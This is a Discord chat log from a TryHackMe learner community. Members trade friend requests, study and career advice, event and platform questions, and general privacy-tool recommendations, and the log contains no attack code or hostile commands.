#quiet-conversation

Cyber Sec 101 is replacing it.

ah what will be the differences if you dont mind me asking?

Cyber SEc 101 has content from the beginner path, and updated content too

The older path is really old content.

I just send you a request

thank you!

Gave +1 Rep to @south inlet (current: #2 - 3443)

I haven't received any request and neither do I have any notifications of accepted requests. It also says I don't have any friends on tryhackme. Was I supposed get notifications? Something seems wrong. @zinc iris

You get E-mailed.

Oh thanks I found it now

Gave +1 Rep to @south inlet (current: #2 - 3444)

You should check your email and accept the requests

Accepted 😀

When is the update coming?

Still cyber sec 101 is already here

You can enroll and learn, it’s just the old pathways weren’t removed yet, which is going to happen now.

Do any of you guys actually work in the field? How long have you been on THM

around 5 years

@weary meteor you are a bot , so they created you 5 years ago ?

How was it starting out? After how long would you say you feel you mastered red teaming or blue teaming depending on what path you chose?

You can never master it . I become available to do things on my own after maybe a year and a half - two years 🙂

ive been working in the cyber field for like 1.5 years general IT for another 1,5 year and like 3 years tryhackme i think

I'm real 😦

lol robot

bro is top 13 worldwide on thm leader board

How old are you anyway? Did you do any previous learning? If you are from a rural part of Serbia I'm guessing you weren't around hacking much. I'm sure that if I didn't stumble on to THM I wouldn't have had the chance to learn all this as compared to someone living in like USA or some other more advanced country.

Did you do any prior learning? How did you get a job in IT

I'm in early 20s . Yes THM/HTB and suchlike platforms are only places where you can learn cysec from here . There's no cysec school/uni here 🙂 .

i did a study regarding it administration. did an internship for a multination company and from that company i got my first job in IT as a working student at the support desk, did my internship at the soc, worked at the soc

and now im here

i just got really lucky with internships

I'm in 20s too. Wish I started sooner since THM's been around since 2018 I think.

Where U from? How is it working at the soc?

I started in oct 2020

im from the netherlands and working at a soc is pretty fun

i do alot of networks but i like endpoints more

is there any way to pay for the SAL1 in emi on a monthly basis?

There isn't.

I am planning on taking this cert, but wanna check is there any option for emi?

What's emi?

Ig Emi is like they can pay half half amount no fully at a time

Ah, I don't think THM offers that.

Not sure I just guessed

did you had any certificates in the moment while applying job/internship

only tryhackme i think

some low level cisco certs

no big certs that would need an exam or anything.

You are so lucky

In my region most employers asking for certs and working experience

i just counted my internship times as experience

I think the hardest thing in cybersecurity is finding entry point

Like internship

well i also think thats because people shoot high

just start at an support desk and work your way up from there, tell your bosses what your interested in and see if there are options

@weary meteor congrats on becoming a room tester!

oh damn congrats indeed. Very deserved

@next bronze @fair vine Thanks 🙂

Gave +1 Rep to @next bronze (current: #222 - 35)

kgb has officially joined team awesome

Kindest and most helpful of all 🫶 Congrats KGB!!

Is it a paid role?

Well congrats regardless, I am coming for your streaks 🗣️😅

Wait I just realized I posted this on a completely different room

Sorry guys moving the post now

It's a voluntarily role 🙂

hello everyone I just joined the discord !

Hello , welcome 🙂 👋

I recently started the learning path on tryhackme excitedd

Thanks 🙂

Gave +1 Rep to @ocean pine (current: #254 - 28)

helooo

how is everybody doing so farr

Not bad , how are you 🙂 ?

all is well so far

Glad to hear that 🙂

thanks likewise!

Please be mindful of our advertisement guidelines #rules

hey everyone , I wonder , if I'm having a day and can't work for any reason , does all my streaks goes away , to zero ?

yeah unless you have bouses that can freeze it -_-

You can ask staff to restore it or use streak freeze 🙂

can they restore it for free ?

Yes , they will 🙂

Hey everyone! Hope you're all doing well. I’ve made the decision to go all in on cybersecurity and just upgraded to the premium membership. Wishing you all the best! This is my commitment to mastering the core concepts so I can help protect those vulnerable to malware online. 🥷 💻 🛜

Good for you ! keep going

good to know

Yeah I know a few people who had their streak restored 🙂

I didn't missed any day yet but I was wondering about it

how can I do streak freeze though ?

hello im having trouble adding my write up to a box:
tittle==>ColddBox-Easy THM Write-Up
link==>https://medium.com/@collinsswah/colddbox-easy-thm-write-up-873a40180554

why do i get an invalid URL error

You can get streak freezes as a prize on events 🙂

Hi, guys. I am enjoying the Pre-Security lessons. Thanks to my mentor I've only known online who is kind enough to share these stuff to a newbie and answer my questions. The CS community is cool!

Thanks brother. Keep it up too!

Gave +1 Rep to @zinc iris (current: #1340 - 3)

Agreed, the community has been very welcoming.

If you have a 1 day streak freeze equipped, I believe it's automatically enabled if you miss a day. You unlock 1 streak freeze at 7, 30, and 90 day streak.

Did you thought about creating a room in THM ? you seems capable ?

Yes

I’m in the Linux Shell module in Cybersecurity 101, and I’m at the practical exercise that requires me to switch to root mode using sudo su to run a search with a script. However, I don’t know the root password for the machine, and I can’t find it anywhere. How can I proceed, or does anyone know the password?

'su' by itself takes root account password; 'sudo' takes the user account password; 'sudo su' uses the user account password and the user's group membership to become root without knowing the root password

And what is the password, or where can I find it?

Did you have to log in to the linux user account you're in now? It should be the same password

Not sure, I haven't seen that exercise in a while, but you definitely don't need to know the root password to run 'sudo su'

I managed to do it.

im pretty sure they state the root password if it is a different one in most rooms like that and otherwise it's the same as the user yeah

cool

Not yet 🙂

Try with user@Tryhackme

Subscribing to THM will not mandate life time. One can cancel anytime right?

Yes 🙂

Ok

I will glady accept $15 a month for the rest of your life please

The internet was down for like 3 hours , I feel alive again !!!!

Three hours without internet probably felt like forever, lol.

it did

You may have an addiction

I think most people are, I don't hate it

we are cybersec nerds if any of us didn’t have an internet addiction that would be hella surprising

https://tenor.com/view/hello-kitty-gif-9533440

hello kitty

3 hours is too much!! I feel dead in like half an hour

If I set up a docker container, with a vulnerable cms version, can I try to attack it from my vm ?

and if I can does a command with a syntax like (nmap -sCV localhost) work

Good morning is the tryhackme site having issues?

yes

We are investigating problems with the website, please be patient!
Sorry for the inconvenience.

Jabba Bravo

https://tenor.com/view/no-bobux-bobux-robux-no-robux-free-bobucks-gif-26792734

@fair vine np that angry guy was a JK

Ok after relaxing on the Switch, seems like the site is back!😃

Hmmmmm looks like there's still issues in the technical side on the site. When submitting answers I see red "An unknown error has occurred".

It should be resolved soon 🙂

Yes issue resolved. Btw, I don't want to see tariffs imposed on Japan. The new Switch 2 is coming out this year and don't want heartattack price on the new console that would make it inaccessible.

How can I access the reverse engineering room
It says it is private
Can anyone help me

You can't, if it's private.

There is no way to do that ??

No. 🙂

Can't you?

You know better than me that I know how to do it.

Yeeeaaaaaap

With the heavy caveat that it's private for a reason, look at #announcements and see if you can figure that one out.
It's not exactly a big secret.

Hello, that room has been retired from the platform. 🙂

Good evening everyone. General question if you don’t mind. How can I access the SOC Simulator on the platform? TIA

https://tryhackme.com/soc-sim

Anyone else in here that's having issues with starting the certification?

Hii there! I wrote a blog on medium and want to submit that writeup to the CTF which I solved. But when I give the URL to my blog post it shows an invalid URL why? can any help me to solve this issue? Or is there another way to get approval to upload a writeups?

You need to encode the @

URL encode

Thanks @south inlet

Gave +1 Rep to @south inlet (current: #2 - 3490)

Still not working

Did you remove the @ ?

yes, I used cyberchef to encode the url

What did do to the @ ?

I did not used @

What did you use instead?

I simply encode my url using URL encode. Is there anything

wrong

Can you tell me the syntax? It's little confusing

Did you swap the @ for %40 ?

so

email=example@outlook.com becomes example%40outlook.com

Yeah I did now, It's submitted. Thank you

Just asking, what did you have before?

1st time I thought that you mentioned giving @ to use encode URL for encoding and I did encode to all special characters which is why It was not accepted. When I only encoded the @ it was accepted. It's a misunderstanding. But I still did not have my writeups in there tab.

Yeah, the author of the room needs to accept it. 🙂

Which room was it?

Mr.Robot

Ah, that's an older room, so it may or may not get accepted, depends on the activity of the author really.

Yeah, It's fine. My job is to submit a blog.

But yeah, It's great to meet you.

Nice to meet you too!

Hope you enjoy the server and learn new things and network well 😄

Yeah, It's worth having.

is there a room for cewl ?

No, it's mentioned in password attacks though

Other than that, there is a task for it in the 2023 AOC.

okay

There is? 👀

I don't remember using cewl

Let me check and get back to you real quick.

Oh.. its Task 10 of AOC 2023. Apologies for the confusion.

Np, I'll try out AOC 23 sometime

I tried 2019, but the machines are broken

Nice, I just finished the SOC-2 learning path. Now I just need to decide if I'm going to keep charging ahead and take on the Security Engineer route or take a side quest on this SAL1 cert...🤔

Congrats , great job 🙂 🚀 🔥 . SAL1 is pretty new cert. it may not have industry recognition yet 😦 . Try to ask guys in #cyber-and-careers channel , they can give you some great advice about your cert. journey 🙂 .

hi

I found this rome about tmux terminal , and wondered , does anyone of you using it , because I don't think I will leave the oringinal terminal and use it ?

I use it sometimes when i need multiple rev shells in the same room 🙂

i use tmux almost daily, I think its very nice to have like splitscreens in your terminal. or the sessions, like starting my vpn in a session and then i can detach the session so it runs in the background, same goes for long processes like a bruteforce or something

you can ofcourse also use multiple terminal windows for it

has anyone done the sentinel and kql rooms that are b2b?

Absolutely!

Is that your username on thm "en4ex"? I've sent you a friend request if it is

check your mail

Hmm thats weird I accepted your request through the email but when I refresh THM I still see no friends

@wraith echo you both need to add eachother im pretty sure

so you add ***** and **** adds you

I don't see you among friends either

Oooh okay. Thanks for that info

Gave +1 Rep to @fair vine (current: #202 - 39)

U got same nick on THM as on Discord?

no its ttryinnggghaackkeerr

did anyone here ever use microsoft emulator?

Hi. Want to join a team, and eventually able to join future THM events. 💯

Check out this channel #1347596231551225887 🙂

Guys any good vpn or proxy..
Coz I wanna change my vpn

What's the use case?

Want to hide my presence entirely

While scanning a web application

Ooh alright gonna add you right away

Absolute top Mullvad vpn they offer to pay anonymously either in cash or by paying with Monero (XMR) aka anonymous crypto also if you pay with it they give you 0.5 euro off also you do not need to supply any personal details to register it's very robust with Wireguard available which is way faster and secure then OpenVPN protocol and if you combine that with its Mullvad browser with turned on proxy maybe also cloudflare proxy with turned on DoH in your OS itself it might be pretty good combo also don't forget to check hashes before starting installer and check for frequent browser leaks or turn wireshark and dive in. Sadly Mullvad is in 14 Alliance but they say they don't share its info also it has strict no-log privacy another variant is Proton VPN you can buy a full proton ecosystem which I can highly recommend. The VPN itself is very nice I tried it and nice but the design is a little off my expectations not as minimalistic and smooth as Mullvad but pretty nice too! Proton VPN is outside the 14 alliance and as I said in combo with its ecosystem might be very powerful! You can also check its free trial on Proton VPN and last variant is IVPN which I don't know much about so I would recommend you to go check it out by yourself but I heard nice things about it.

Okay, let's dive into it! To hide your presence entirely you must understand HOW protocols work, HOW is your traffic processed WHERE is processed, and also the fundamentals of how web servers behave. Let's start with choosing the right browser. Browsers collect info about you or more specifically websites collect thousands of info about you once you visit them they call numerous APIs. Those contact your browsers and the browser gives them your info. For a fast and nicely designed experience, I recommend Brave. For a slightly slower but more privacy-focused experience, I recommend the Mullvad browser, and for top privacy but the slowest I would say I recommend Tor. Tor is also in Brave but just so you know. Or for the highest I2P software. Next is the search engine. So many people used to think that DuckDuckGo is number one in this (also me) until I discovered that they collect your info BASED on how you interact so they will technically ASSUME what to collect. So I choose the Mullvad browser Mullvad leta which is slow and has its index but I would recommend Brave search engine it's nice and decent in its speed and has also its index. I love about Brave that you can use shortcuts to search through different search engines so if I want for example something quick to search or not important I simply type :g [your input] it's nice if you want to google dork cuz Brave search engine does not support that kind of thing. The next major thing is extensions. More extensions = slower experience but I don't mind tho. I use a couple I would say to hide my fingerprint as much as I can but it's kinda insane case I use this setting in just most extreme moments for simple searching would be enough: privacy badger (privacy in general), uMatrix or NoScript (block unwanted scripts), uBlock origin (privacy in general), Canvas Blocker (block APIs from sniffing on you), Decentraleyes (dont connect to CDN which could expose your info) ----- Part 1.

In my Mullvad browser I use this combo if you want to take privacy seriously but its pretty slow I must say: NoScript, uBlock origin, privacy badger, Chameleon, Canvas Blocker, Decentraleyes, ClearURLs, Cookie AutoDelete. Just dont forget to configure browser settings properly! Thats cruicial thing. Alright now lets head to set up our traffic protection. We wanna talk about proxy and VPN. As I said in first message I use Mullvad VPN for me its just top. In order to secure your traffic (at least) from your ISP you have to configure DNS. Yeah thats the thing I did typo instead of DNS I wrote proxy. So yeah if you use windows in ethernet or wifi settings you can configure DNS. Normally its set to Auto or som but we want to set it to manual. I personally use Cloudflare DNS I know they keep logs for 24h but I dont have to care much cuz I dont do antyhing shady and my DNS is routing trough Mullvad is that fails then there is the backup of Cloudflare. Cloudflare offer free DNS resolver. Both for IPv4 and IPv6 but I would recommend using onyl IPv4 because IPv6 likes to leak or thats what I found on internet cant say its true tho. Once you put everything in place those IP addresses you need to select DNS over HTTPS (DoH) so its properly encrypted BUT DONT SELECT fallback to plaintext thats worst thing you can do. Now thats our backup. Now every website you visit auto logs your IP address and some other info depends on configuration of that server so you must be aware of that fact. If you chose to use Mullvad browser (which I highly recmmend but Brave is also fine) you got autp pre-installed extension from Mullvad. Its Mullvad proxy. If you set that up to completely different location then your VPN it could be nice combo. It might be slow but thats what privacy is about. Privacy cost us time these days. So yeah once you set everything up you can possibly start Wireshark and monitor your traffic to optionally re-configure something. DONT FORGET TO CHECK FOR B ROWSER LEAKS!

But dont hack without proper consent! Always ensure you have full permission to test what you want to test.

@wraith echo Is this all from AI?

Nope this is totally from my expirience not a single prompt to AI just pure 6 years since my 10. @south inlet

Yeah do it

Sent🫡

hi guys do i really need in someday to use zeek from CLI (if i have SIEM ) ?

Hey there. Nope I dont think you have to.

so i can see video about it as CTI USE and skip the room or what ( what u think is best for me to do ? )

Would you be willing to share a little about your setup? Like what SIEM you use etc.?

well i dont have setup atm im just studying but if u have videos like that will help me alot just give me the name of it i will take it from ther

like how to use it with Siem the best way

or something like that

and is it working with some better than other like some tools working with spluck better than let say ELK ?

I bet it does its at the end of the day its open source so I think it will totally work. I found some videos for you describing some combos with ZEEK with various of SIEMs I am not really educated in this field I know a little about it but all I have is sysmon with Powershell scripts and IDS soo yeah.

https://www.youtube.com/watch?v=IwlV3wVX4xs
https://www.youtube.com/watch?v=B20u53S72zA
https://www.youtube.com/watch?v=aqTHGRUEYgM

aha ya idid see about sysmon combos with spluck and supluck with snort

but thx alot m8 i will see what to do with zeek ❤️

thx alot brother for the help ❤️

No problem happy I could help at least a little😁 Wish you smooth studying

thx i hope u the best in life man ❤️

You too!

Damn I see someone extremely passionate about cybersec. Your profile on THM is epic😭

Mullvad

I'm so sleepy tonight even the easiest stuff not working with me , I'm going to bed

i just keep getting coffee until my brain melts, then i can go to bed 😂

@odd acorn

Well I wouldn't really say epic there are better ones for sure.
Passionate yeah but there's still a lot to learn.
How about you how come you haven't done more on thm

Well its hard to manage time properly. I am freshly on highschool, I am trying to follow my dream and build my company which isnt easy cuz I found out the hosting provider I chose isnt capable for serving me good quality CMS go hugo linking DNS etc etc which I am learning while programming its such a mess, I am uploading on yt from ctf platforms which I am also writing writeups on gitbook so yeah I wish I could have more time for that

I spent all money on that hosting so I want to make it work till I have time

Wow really...what kind of company?

Welp its mission is focused on work with people dont want to specify much but yeah its a good thing without trackers, ads and this stuff

Well whatever it is I'm sure the hard work and learning will pay off in the end...also my profile might be misleading too I don't come close to someone with years of experience and work in cyber and IT

Yeah I hope it will I already sacrificed many things. Oh I thought u do

Have you worked with hugo by any chance?

No what's hugo

Its SSG U heard it has fastest caching or som but I am building site with it and havent heard of it so I have to read every single documentation its pain

Nope first time hearing about it

Oh nevermind then

hi

I never joined any events in THM and I wonder if anyone can explain how they work, is it like the normal ctfs on the site ?

I saw that there is an event coming and I don't want to join a team while I don't know everything to know

You can learn more about the upcoming event here 🙂
https://tryhackme.com/hackfinity

thank you

Gave +1 Rep to @weary meteor (current: #1 - 3862)

Are you in a team ?

No , I don't think that i will participate in this ctf

okay

have you participate in events before , if so , do you have any advices , it's my first event

I participated in aocs and side quest in 2023. Don't worry , the purpose of the event is to have fun . Try to find some new friends in #1347596231551225887 channel and enjoy 🙂

general question, would you guys choose 24 or 27 inch for a monitor. Its used for work, gaming, movies. pretty much an all around used monitor. I currently have one 24 and one 27 inch, i just dont know what to choose and would like some opinions

27 for me

100% 27

I have two 27 monitors non wide, but with high gaming specs. I use them to work and of course to game.
Im considering getting a ultra wide one though, that you can also split the screen like two independent monitors, but these are quite expensive.

but id def stay with a minimum 27"

Thanks guys

Ultrawide would be nice but i dont wanna throw out 2 good monitors for one

question

why the names in the server written in different colors ?

if you mean our usernames, it based on our roles and the roles are based on our thm rank

there are also other special roles which will give different colors

yeah that, thank you

Gave +1 Rep to @fading shore (current: #1351 - 3)

How to intercept a blutooth signal 🚦

Why are you asking? 😄

Just for practice bro

What you practicing sister?

I'm boy not girl

I'm not your brother either... 😄

Ok, what are you practicing?

Intercepting signal to decode signals bro

What sort of signals sister?

I'm boy not girl

hey can someone help me in setting active directory for homelab

Go and view in YouTube okey

Got stucked on network configuration

Use ChatGPT also bro it will help you to solve this problem

What are you having an issue with exactly?

I am looking for a team to join for the new event (Hackfinity Battle) is there any team might be interested =?

#1347596231551225887

I joined the chanel but I can't text there. I need to be added I think

You need to be verified.

this convo is the funniest I've seen all day 🤣

https://tenor.com/view/nephew-roommate-father-brother-cousin-gif-11282634

great movie that

is it recommended for beginners to join the hackfinity ?

Yeah , why not 🙂 ?

how many people are supposed to be in a hackfinity group?

like whats the maximumm

To my understanding, it is 5. Do post any questions you may have on the #1347217239492919346 channel

thanks man sorry

How such events like the hackfinity usually work ? Will there be different rooms inside it kinda like the Advent ?
Im asking because I wont be able to participate , but of course, if possible id like to access the "challenges" after

Ill be exactly on those days on a trip

A room was created for it - https://tryhackme.com/room/HackfinityBattle

Suggest to post your inquiry on the above mentioned channel for a better response.

thanks

Gave +1 Rep to @little shore (current: #12 - 779)

who can help me w the tut vc?

I think thay you will still be able to access the challenges 🙂

Shhh it’s quiet 🤫

What is tut ?

https://tenor.com/view/scoobydoo-gif-622972956672831224

Thanks!

Gave +1 Rep to @weary meteor (current: #1 - 3928)

i think he means tutorial

not sure tho

Hm , may be 🙂 . Thanks for the tip

Gave +1 Rep to @fair vine (current: #193 - 41)

Done!

how do i join vcs?

You need to verify your account

this might seem stupid but i watched mr robot recently and it made really want to get into hacking and cyber security and stuff but i really dont know where to start or anything really . can i have some advice

lol i just want to make this sure my laptop isn't gonna get a virus from this

we all been there, start at Try hack me, linux fundamentals, strong start

Start with the TryHackMe advert of cyber series, its a great introduction, them if you like it start working your way through the rooms on the site

You can start with this path 🙂
https://tryhackme.com/path/outline/presecurity

FELLAS I NEED HELP

DM ME FOR MORE DETAILS

guys how is it going I'm getting ready for the next hack event this 17th I have a partner we need more mebers to complete the group of 5 DM me to send you the link

ask here 🙂

Ask in #1347596231551225887 channel 🙂

thank you so much

me: (clicks on AttackBox) ...waitwait Terminal -> sudo apt install emacs

Is anyone is there who need best a team member for solving rooms

#1347596231551225887 🙂

😭

Hello

:hammer: raditya199#0 has been banned.

Try to reach out to support for account related issues . You can get in touch with them on the email below 🙂

anyone have avg antivirus ?

when I do scans , it tells me that I have 5g system junks ?!

what are these ?

@near lagoon Please don't promote your own tools.

Ok sorry ! I would like to know where can I find crypto experts to test the strength of my tool ?

I have no idea.

What's the problem ?

@south inlet

Pls who can help me on partitioning my hard drive for running dual OS

do you have windows installed already? USe WSL

or look into grub if you still want dual boot

Hi all, is there anyone I can add as friends? Would be nice to see other people's progress

Galaxy rat

hey is anyone here who can help me to solve a ctf cryptography problem??

Every day, a new challenge, a new skill learned, and a growing passion for cybersecurity! 💻🔐

You can add me if you want , KGBTHM is my thm username 🙂

Congrats on your first 100 days , great job 🙂 🚀 . Keep up the good work 🙂

Which room ?

Thanks 🙂

Gave +1 Rep to @weary meteor (current: #1 - 3967)

Damn bro you've been grinding on thm 🔥

Can I send you a thm friend request

me too can i send a friend req

https://tenor.com/view/please-please-please-pwease-gif-23060934

Hey guys any idea on why does firefox remove my burp suite cert on kali vm? I get an error like I never imported it to firefox

Is your firefox updated?

Yes I do regular updates

It first happened a couple days ago I imported it and now again the same thing I had to download a new one and import it

That seems odd. Did you check if the root certificate is still valid?

What do you mean by root cert? I'm a little new to this

Yes

There is only one cert I know of for burp that is the one I downloaded and imported

Thanks @weary meteor ,request sent 🙂

Gave +1 Rep to @weary meteor (current: #1 - 3983)

Request accepted 🙂 🤝

https://www.prophetic.com/technology could you lock someone in REM sleep?

how quiteness can be a conversation?

Whispering. 😄

sent it

Congratulations, that's consistency

_whispering.... give me task 7 flag😂 _

Lol I thought I was the only one

it isn't that hard but might take patience

Can anyone help me in ghost phishing how to find flag of it

can any one help me in task because my virtual machine not running

Shh it’s quiet 🤫

No hints are allowed

Try to ask in #site-support 🙂

Anyone has any OSCP like boxes list on TRYHACKME in preparation for the exam?

....

Hey guys, I was wondering if anyone here wants to be friends on TryHackMe, for me, seeing other people's progress helps me stay productive, here's my user if anyone's interested🙂

User: Verax1ty

You can add me if you want KGBTHM is my nickname

🙂

Awesome sauce

Sent.

Thanks , i will accept it as soon as i get back on my pc 🙂

Gave +1 Rep to @marble ridge (current: #942 - 5)

Thanks for being my friend!

Gave +1 Rep to @weary meteor (current: #1 - 4047)

Sent you a request.

Also sent you a request.

Accepted!

Thanks , i will accept it as soon as i get back on my pc 🙂

https://tenor.com/view/shh-cats-gif-14317670277085954258

it's quiet

The conversation is very.. quiet

https://tenor.com/view/shh-sh-shhh-shhhh-shhhhh-gif-10099479385626427626

Can anyone suggest me any room on try hack me for improve mobile application penetration testing?

why cant i upload images?

like in this channel

You will need to verify first , you can learn how to do so on the link below 🙂
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Does the SAL 1 cert help in any way towards the CySA+ cert? TIA

Try to ask in #cyber-and-careers channel 🙂

I will do. Thank you

guys, I just got notified by hackerone that my password was found in a credentials dump. But the password I used for hackerone was a randomly generated one. What could that mean

Change your hackerone password?, and scan your system for malware with malwarebytes or an anti virus solution

Check it's actually hacker one emailing u

Pretty vague question , ive talked about this a while ago im currently doing a personnal project with an hmailserver , i have a question , is there a way to know if my server is really blocking spams ? logs and stuff dont show anything i may have set something weirdly

Try to ask in #infosec-general 🙂

I'll send a request, and my user is Jadeth 🙂

Alright

Accepted

Nice

Hey guys

Hello

Hey

Still working on hackfinity?

#1347217239492919346

@south inlet

Done!

Would you mind if I also sent one? I also think it would be nice to see others progress for motivation. 😁

Yeah, go ahead

Awesome! I'll be sending one my username is THeCha0ticSe1g3!

Alright

Accepted!

Thank you

Np, thank you for friending me :)

You're welcome!

Sure, I'll send a request now 🙂

Ty, I Accepted your request.

Gave +1 Rep to @wet sky (current: #2759 - 1)

Also looking for friends here on Discord because we have same views and interests

sent you a friend request. It's so hard to find people to actually talk about this stuff with if anyone else wants to team up and work on CTF challenges or rooms together please please add me I've been trying for weeks and can't find a single person who does more than a few questions a day

hi huys, im new here.

Hey bud nice to meet you

nice to meet you too

feel free to add me as a friend if you ever wanna hang out and work on some things together. I'm very much a beginner but trying to find some friends to collaborate with and keep me motivated

Hi , welcome 🙂 👋

yoo good to hear, if u wanna someday do some machiens together u can dm me if u want 🙂

Def will, I'm usually on as much as possible after work monday through thursday then pretty much all day friday-sunday

ill be on saturday and sunday all day probably

kk

@radiant jacinth @radiant jacinth

?

Hello

I speak English btw, and server rules state to only speak in English with all do respect brother or sister.

Hello brother

Can you talk to me in private chat?

Sure brother I will send you a friend request

https://tenor.com/view/shangri-la-frontier-bunny-hop-emul-shangri-la-gif-14499625085508894741

SSH everyone, this is quiet conversation.

Hi everyone

Possibly CyberChef I would say. cyberchef

i try already but no result

????

Is this from THM ?

yup

Which room ?

encryption

Provide a room link please

.

@south inlet

Done!

I saw your message, I just added you. I also just started on thm - I do have some previous experience in cyber security so I wouldn’t say in a total noob.

Good afternoon is there anyone around to do some rooms? Dm if you wanna hang out and some things together

Spoiler: I'm a beginner too

Try to ask in #room-help 🙂

Study partner/guide for oscp, anyone interested please ping

I'm always happy to meet another study partner.

Has anyone done a CEH certification

Be vewy quiet. We’re hunting wabbits

Try to ask in #cyber-and-careers channel 🙂

hi

Please don't advertise external projects 🙂

oh ok

hey everyone Im planning to implement AI to my learning path. Im thinking about IBM AI engineering certificate program to start, and my question is that does anyone of you started or already implementing AI on cybersecurity I would like to get advices from you guys thanks.

I'm using AI sometimes to help me with my scripts , it is a great assistant 🙂

Help

Why do you need help?

Hey
I'd love to be friends

Hey
I sent you request

Hi Guys
My name is St. Oasis and I am from Nigeria
I am new to TryHack me
I's all confusing
I'm done with School in a few months and I want to get a masters in cybersecurity but first I want to get a Job in IT.
A remote Job
I need help!

Hi Marcus
Can I reachout too?

hello k

I used a steak freeze on Saturday and I'm wondering when I can acquire a new one. I don't recall if I got my last one at 60 or 90 days. Do they coincide with the badges? If so, does that mean I can get the next one at 365 days? (I'm currently at 113 days)

It looks like 180 days is the next one

https://help.tryhackme.com/en/articles/7843540-streak-freeze

You can often win streak freezes during some events 🙂

Oh, this is good to know too. Thanks 👍

Gave +1 Rep to @weary meteor (current: #1 - 4189)

Good day, have anyone tried here changing email address? After changing my email address, all the progress and my subscription restarted.

hi guys is there anyone who could give a second opinion on the monitor and hard drive im planning to buy?

maybe contact support

hello there

helloo

i'm bored

iv been planning buy the premium version , anyone care to share your opinion?

It's worth imo but if you're on beginning of your journey you don't nevessarily need it immediately . There're over 500 free rooms on THM 🙂

anyone wants to start a startup?

When I was starting out I was worried about not being able to do certain paths so getting premium was what got me to get on a good schedule with learning with less worry. Now that I am father along I don’t need premium for a little.

Would love to get some friends on Tryhackme, I'm currently a student in cybersecurity and on a few learning paths here right now and it would be great to get some motivation from others who is learning as well. Feel free to add: bystrom 😄

Feel free to admin me if you want 🙂

Request accepted @median fossil 🙂 🤝

in a CTF, do i'm supposed to use only the Verified exploit ?

There’s no need, but you should understand the exploit code so you’re not running malware

Also remember that exploitdb is not the only source for exploits

thank you !

Gave +1 Rep to @daring vapor (current: #282 - 25)

In a THM lab environment you can do whatever you want , they're restored to defaults on each restart 🙂 . In real life scenario , that verification won't also mean much anyway . By using exploit we're trying to perform something that clearly wasn't supposed to be happening , many exploits are unstable and will crash the machine in some cases ( eternalBlue ) as an example .

thx for detailling 👌

Gave +1 Rep to @weary meteor (current: #1 - 4206)

You can do what you want within reason, if you're using a THM machine for a purpose which is not intended, you're breaching their ToS.

🤓☝️

Does anyone know how much the EXP-401 exam cost offered by OffSec?

Hey, I'm wondering. What kind of motor would I need to use to lift up an heavy weight (~10kg) at the end of a fishing line : servo, stepper or dc ? Maybe some other kind that I don't know of

I meant in a context - don't worry about running unstable exploit against THM machine and crashing it since it will revert to defaults next time it is started 🙂

Hello
Can I reach out to you too?

What's the problem 🙂 ?

I am new here and I'm sorry if it's too much but I need help
I'll been done with school in a few months and I want to master in cybersecurity. I love security a lot and I have done Comptia A and N+ a while back and I know now, I have some to relearn a lot. So I took google's IT support Programme. After that, I wanted to take the Cybersecurity course but I saw Tryhackme and I don't even know what way to go or how to start. There's a lot of material on the internet and It can be frustrating. I need Help

You can start with the path below . To learn more about Discord check out #start-here article 🙂
https://tryhackme.com/path/outline/presecurity

Thank you

Also if you're looking for a career advice , check out #cyber-and-careers channel 🙂

Thank you

hi,

i want to know this scenario is real vulnerability or not

a weak 2FA setup where the system allows the use of an untrusted browser extension (such as the Authenticator extension in Chrome) to configure two-factor authentication. This indicates improper device binding or context validation during the 2FA setup, allowing an attacker to potentially hijack the 2FA process. To mitigate this, the system should enforce strict device verification and context checks to ensure that only trusted devices can configure and use 2FA.

thank you i will !

🔇 Muted charleskeith0134 for 1 day

Hey please don't self promote here

I think the best option is to submit it and they will tell u if it is a vuln

gut morning

or night should i say

Jr Pentester path complete! 🥳

Congrats , great job 🙂 🚀 🔥

congrats!

https://tryhackme.com/room/zer0logon
the room working for you?
im stuck cant see the questions and cant start the machine

Realtek RTL8723B Wireless LAN 802. 11n USB 2.0 Network adapter . Hallo everybody I tried to install kali Linux on my laptop but the install setup kannst find the driver for my network kart anyone that can help thx

I wouldn’t recommend installing a bunch of drivers from random sites. Are you trying to install it bare metal or as a virtual machine? I would recommend you use VMWare (watch a YouTube video on how to get it free) and then watch a YouTube video on installing the Kali image on VMWare for your first installs. Keep in mind that for windows computers it will be VMware workstation vs Mac OS it is VMware Fusion.

I tried to install it bare . But the install setup from kali Linux doesn't recognise my network kart. I tried Google but didn't find any solution

My laptop can't handle vm it can't even handle win 10 probably

Shh it is quiet

I was solving the room kenobi and I found a different path than the one in the walk through. Not sure if this is intended also not sure if this is an issue and if this is the place to report such. To avoid spoilers admins can write me in private.

there is any voice channel ?

Yeah , many but you'll need to verify to access them . You can learn how to do so on the link below 🙂
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Greetings, hope everyone is having a very productive day

Thanks , same wishes to you too 🙂 👋

Gave +1 Rep to @cloud mantle (current: #2778 - 1)

Hello everyone, Im new in Tryhackme, but im having an issue in "Windows PowerShell" entering the credentials, but i cant, so if anyone had the same situation that could help me out, cheers

Hello , try to ask in #room-help channel 🙂

I had something to say but forgot what I wanted to say.

Happens to me all the time 🤣

Hi guys I'm chef from India doing master's in computer application called Mca in India I live tier 3 city, I'm new cyber security just started,
The Situation is i got job offer in school for IT admin timing in 7am to 4pm salary is 15000 inr
I'm confused what to do according to my city this is not too much low salary but it's low little bit , in india you do unpaid internship or paid internship amount is 3000-20000 depends upon city region
My friend is doing job in state captial as vuejs developer his company giving 29000 salary but his expenses like rent miscellaneous expenses are high after everything he got 15000-18000 in hand
My job offering office is only 600 meter and 0 expenses I'll pay
Why I'm thinking for this IT admin role reason is it's hard to job in cyber security as freshers if I get I'll receive same pay like my and same expenses
I'm thinking to join this job for 1 year learn cyber security at the advance it will receive one year experience
What should I do please help me

@sharp pivot join, atmost you'll gain experience in Networking, meanwhile keep learning other aspects, keep trying for relevant certifications and finally keep looking for better opportunities if you feel you've learned everything that that job has to offer. Best of luck buddy!

I would accept the job. Experience gained at work is always superior.
Also, you won't be overwhelmed with tasks at the school, you can experiment and will have down time which you can use for studying.
Don't spend more than 1-2 years there, continually strive to upskill and attend a couple of job interviews once in a while to keep yourself fit.

What is a tier 3 city, btw?

Tier 3 city mean small urban developing city , who don't have metro ,city area is 10 miles

Thnx bro for your advice

Thnx bro

No problem

